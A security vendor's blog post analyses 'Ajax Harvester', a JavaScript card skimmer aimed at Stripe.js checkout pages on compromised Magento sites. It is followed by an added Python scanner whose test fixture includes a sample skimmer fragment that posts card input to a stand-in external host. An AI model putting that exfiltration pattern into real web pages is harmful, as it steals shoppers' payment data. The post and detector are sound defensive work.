Foregenix Blog

Mike Hinton

New JavaScript Malware Targeting Stripe.js on Magento Websites - Ajax Harvester

web security, Magento, malware, JavaScript

04/04/17 07:53

The Foregenix DFIR team has discovered what is believed to be an unreported piece of malware that has recently been used to target insecure eCommerce websites processing payments through Stripe and running on the Magento framework.

The Malware

Dubbed ‘Ajax Harvester’ by analysts, the malware is a piece of JavaScript which, when inserted into a compromised site, waits until a Magento payment page is visited. It specifically looks for payment pages using the One Page, CheckoutSuite, One Step Checkout and Fire Checkout page titles, as shown below.

[Image: Ajax Harvester - Stripe 1.png]

If a payment page is identified, it loads a further JavaScript file (in this instance named ‘extra.js’) which searches for input fields specifically related to the now deprecated, although still widely used, ‘stripe.js’ Magento payment integration. Some of the malicious code is shown below.

[Image: Ajax Harvester - Stripe 2.png]

Although the malware is not unique in its functionality, it does mean users could have their credit card data stolen even before they have pressed the checkout button. Rather than writing harvested data to a local harvest file for later retrieval by the attacker, it posts the data to an external server controlled by the attacker, using a jQuery AJAX function, as soon as values have been entered into an input field.

What does make the malware distinct is the fact that it is directly targeting the Stripe.js code for Magento.

Prevention

This attack is only possible when a website is insecure. To be clear: although it focuses on the Stripe.js integration for Magento, it can only take place once the website itself has been hacked. Preventing it therefore requires the website administrator or web developer to keep the website secure. Here's an article we recently wrote on Securing Your Magento Website.

Detection

In order to detect this malware on your website, you'll need an internal scan of your environment that looks for key indicators of compromise.

You can detect these by using a free Guided Threat Review from the Foregenix team. 
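As an added illustration of the internal scan described above (not Foregenix's tooling and not code from the original post), this Python script walks a web root and flags files that combine the behaviours the article describes: a probe for the named checkout pages, a hook on Stripe-related input fields, and a jQuery AJAX post to a host other than the shop's own. The regex patterns, the fixture strings and the host names `shop.example.com` and `collector.invalid` are assumptions constructed for the example; the heuristics will miss obfuscated code and should be treated as triage, not proof.

```python
import os
import re

# Checkout names from the article; the exact strings and spacing the malware
# tests for are not shown on the page, so these patterns are assumptions.
CHECKOUT_NAMES = [r"one\s*page", r"checkout\s*suite", r"one\s*step\s*checkout", r"fire\s*checkout"]
# jQuery AJAX call with an absolute URL in its arguments (host is captured).
AJAX_URL = re.compile(r"(?:\$|jQuery)\.(?:ajax|post)\s*\(.{0,300}?"
                      r"(?:https?:)?//([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I | re.S)
# Handlers that fire while a field is being filled in, before any submit.
INPUT_HOOK = re.compile(r"\.(?:on|bind)\s*\(\s*['\"](?:change|keyup|blur|input)|\.(?:change|keyup|blur)\s*\(", re.I)

# Constructed fixtures (not the real sample): a fragment with the described
# traits, and an ordinary checkout script posting to the shop's own host.
SAMPLE_SKIMMER = """if (/One Step Checkout|Fire Checkout/.test(document.title)) { /* ... */ }
jQuery('input[id*="stripe"]').on('change', function () {
  jQuery.ajax({type: 'POST', url: 'https://collector.invalid/c' /* ... */});
});"""
SAMPLE_LEGIT = """jQuery('#co-payment-form input').on('change', function () {
  jQuery.ajax({type: 'POST', url: 'https://shop.example.com/checkout/onepage/savePayment/'});
});"""

def indicators(script, site_host):
    """Return the set of article-derived indicators present in one script."""
    found = set()
    if sum(bool(re.search(p, script, re.I)) for p in CHECKOUT_NAMES) >= 2:
        found.add("checkout-title-probe")
    if re.search("stripe", script, re.I) and INPUT_HOOK.search(script):
        found.add("stripe-input-hook")
    for host in map(str.lower, AJAX_URL.findall(script)):
        if host != site_host and not host.endswith("." + site_host):
            found.add("external-ajax-post:" + host)
    return found

def is_suspicious(found):
    """Require an off-site AJAX target plus at least one other indicator."""
    external = {i for i in found if i.startswith("external-ajax-post:")}
    return bool(external) and bool(found - external)

def scan_tree(root, site_host, exts=(".js", ".phtml", ".html")):
    """Walk a web root and map each flagged file to its sorted indicators."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in (n for n in files if n.lower().endswith(exts)):
            with open(os.path.join(dirpath, name), encoding="utf-8", errors="replace") as fh:
                found = indicators(fh.read(), site_host)
            if is_suspicious(found):
                hits[os.path.join(dirpath, name)] = sorted(found)
    return hits
```

Call `scan_tree("/path/to/webroot", "your-shop-hostname")` and review each flagged file by hand; a clean result does not rule out compromise.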
